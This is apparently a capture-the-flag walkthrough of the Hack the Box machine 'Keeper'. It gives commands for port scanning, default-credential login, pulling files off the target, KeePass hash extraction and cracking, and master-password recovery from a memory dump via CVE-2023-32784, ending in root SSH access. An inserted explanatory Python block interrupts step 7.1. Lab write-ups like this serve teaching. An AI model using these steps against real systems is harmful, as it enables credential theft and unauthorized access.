In today’s post, we will be going over Keeper, a Linux machine from Hack the Box. Enjoy!
1) As always, we first start with an Nmap scan to see which ports are open on the remote host:
nmap -sC -sV -T4 -p- <TARGET_IP>
Only 2 ports are open so far. Let’s add keeper.htb to /etc/hosts and explore the site.
2) Upon navigating the site, it’s clear that we have to add a new subdomain, ticket.keeper.htb, which I did:
And the ticket.keeper.htb looks like this:
3) Right away I tried googling the version displayed on the login screen for possible active exploits, but I didn’t find anything. Instead I tried the default credentials for the Request Tracker software.
Thanks, Google! We are in now as an Administrator; let’s see what we can do as an authenticated user.
4) First I was thinking of creating a malicious Script under Admin -> Scripts that would be executed when I create a ticket, but that didn’t work. Next, I found one interesting ticket (ID 30000) where a customer complained about a crash of the KeePass program and attached a crash dump, which I thought might be interesting, but Lise removed the attachment for security reasons, as we can see in the screenshot below…
4.1) Next, I continued enumerating the app, since there are no active exploits at the time of writing for this version of Request Tracker, and under Admin I saw the Users tab. From there I navigated to the Inorgaard user, where I saw the Unix login username and a very interesting comment disclosing the password for a new employee, awesome!
5) I gave it a try over SSH (as port 22 is open as well) and boom, we are in and we got user.txt!
6) Interestingly, I found a ZIP file that I can unzip on the remote host and then transfer to my machine using wget (after starting a Python web server on the remote host with python3 -m http.server).
6.1) I see 2 files: KeePassDumpFull.dmp & passcodes.kdbx
6.2) The first one, the .dmp file, is the memory dump that the support ticket was about (see screenshots above), since KeePass crashed for a client. KeePass is a password manager, and a quick investigation revealed that KeePass leaves the master password in memory due to the nature of .NET strings: CVE-2023-32784, https://sysdig.com/blog/keepass-cve-2023-32784-detection/
6.3) The other file, the .kdbx, is also very interesting as it is the encrypted database with all the usernames and passwords stored in KeePass: https://sysdig.com/blog/keepass-cve-2023-32784-detection/. I can easily obtain a crackable hash from it by running:
keepass2john passcodes.kdbx
Then I tried cracking the hash with Hashcat’s mode 13400, but that didn’t work out (which means the master password is not in the rockyou.txt wordlist).
6.4) Okay, back to the memory dump file. I found this Python script: https://github.com/z-jxy/keepass_dump
And I ran it as:
python3 keepass_dump.py -f ../KeePassDumpFull.dmp --debug --recover
which reveals: [-] Couldn’t verify plaintext match in dump for: dgrd med flde
Here it’s important to mention that recovering the master password from a KeePass memory dump never yields the first character, but from here I see that we are missing more characters than the first one, as dgrd med flde doesn’t make much sense.
Let’s do a Google search for what we have:
That reveals the Danish red berry pudding (rødgrød med fløde), interesting! This explains the missing characters: they were not recognized because they are not standard ASCII characters.
7) So, with the potential password rødgrød med fløde as the master password for KeePass, we can unlock the KeePass database with all the usernames and passwords, i.e. passcodes.kdbx. In order to do so I first:
7.1) Downloaded KeePass itself by following this video: https://www.youtube.com/watch?v=TIHf-X5rDU4&ab_channel=5-MinuteDevOps; essentially, if you are in a Linux terminal, simply run
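To make the missing-character behaviour concrete, here is an added example (my own code, not from the post and not from the keepass_dump tool). It builds a constructed stand-in for a KeePass process dump containing the leftover strings CVE-2023-32784 is about, scans for them, and shows why an ASCII-only recovery turns rødgrød med fløde into dgrd med flde while the first character is lost either way:

```python
import re

# The masking character KeePass' SecureTextBoxEx shows instead of typed text.
BULLET = "\u25cf"


def build_leftovers(password: str) -> bytes:
    """Constructed stand-in for a KeePass 2.x (< 2.54) process dump.

    Per CVE-2023-32784 every keystroke leaves a .NET string in memory made of
    (n-1) bullets followed by the n-th typed character, so the very first
    character never shows up in such a string. Junk bytes surround the strings
    so the scan has to find them instead of assuming a layout."""
    junk = b"\x00\x00\x00\x00fooBAR\x00\x00"
    buf = bytearray(junk)
    for n in range(2, len(password) + 1):
        leftover = BULLET * (n - 1) + password[n - 1]
        buf += leftover.encode("utf-16-le") + junk
    return bytes(buf)


def recover(dump: bytes, ascii_only: bool = False) -> str:
    """Rebuild the password tail (everything after the first character).

    ascii_only mimics a recovery tool that only accepts printable ASCII: any
    non-ASCII keystroke (e.g. 'ø') is then silently dropped, which is how
    'rødgrød med fløde' degrades to 'dgrd med flde'."""
    bullet = BULLET.encode("utf-16-le")
    # one or more UTF-16LE bullets followed by exactly one UTF-16LE code unit
    pattern = re.compile(b"(?:" + re.escape(bullet) + b")+(..)", re.DOTALL)
    by_pos = {}
    for m in pattern.finditer(dump):
        n_bullets = (m.start(1) - m.start()) // 2
        ch = m.group(1).decode("utf-16-le", errors="replace")
        if ascii_only and not (ch.isascii() and ch.isprintable()):
            continue
        by_pos.setdefault(n_bullets, ch)  # character n_bullets+1 of the password
    return "".join(by_pos[k] for k in sorted(by_pos))


if __name__ == "__main__":
    dump = build_leftovers("rødgrød med fløde")
    print(recover(dump, ascii_only=True))  # dgrd med flde (what an ASCII-only tool prints)
    print(recover(dump))                   # ødgrød med fløde (first character still lost)
```

The practical takeaway for defenders is that any crash dump or hibernation file from a pre-2.54 KeePass host must be handled as if it contained the master password itself.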
sudo apt install keepass2
7.2) Then open KeePass, load the passcodes.kdbx file, enter the master password rødgrød med fløde, and it works! Amazing.
7.3) Now we can see that in addition to the current user that we have (lnoorgard) we see the root user as well; simply right-click and copy the password (F4><3K0nd!). I tried the su command and SSH as well with this password, but it didn’t work. Hm…
7.4) Back to database enumeration, and I see an interesting column: Notes. In the Notes column for the root account, I see a PuTTY .ppk file. (PuTTY is essentially SSH for Windows; since we are on Linux we will have to convert the key.)
7.5) Converted it by following the article from AWS (https://repost.aws/knowledge-center/ec2-ppk-pem-conversion):
7.5.1) First, save the PuTTY .ppk file from the Notes column as key.ppk using your favorite text editor
7.5.2) Install the PuTTY tools:
apt-get install putty-tools
7.5.3) Convert the key to OpenSSH format:
puttygen key.ppk -O private-openssh -o sshroot.pem
8) Finally, let’s try to initiate the connection with it over SSH!
ssh -i sshroot.pem root@10.10.11.227
And we are in as root, GG!
Lessons Learned
1) Not every piece of software that we encounter has to have an RCE or some other exploit that we have to leverage in order to progress through the machine. For example, here we were dealing with Request Tracker, which didn’t have a High or Critical exploit; rather, we leveraged default credentials, and with some enumeration we found an interesting comment with a password for an initial foothold.
2) I learned amazing details about KeePass (how the master password can be stored in memory) and about possible password cracking of the .kdbx file by extracting its hash with John the Ripper’s keepass2john. Also, of course, I learned about an amazing CVE-2023-32784.
3) Finally, I learned how to convert a PuTTY .ppk file to a .pem file that is compatible with OpenSSH, from a Linux terminal.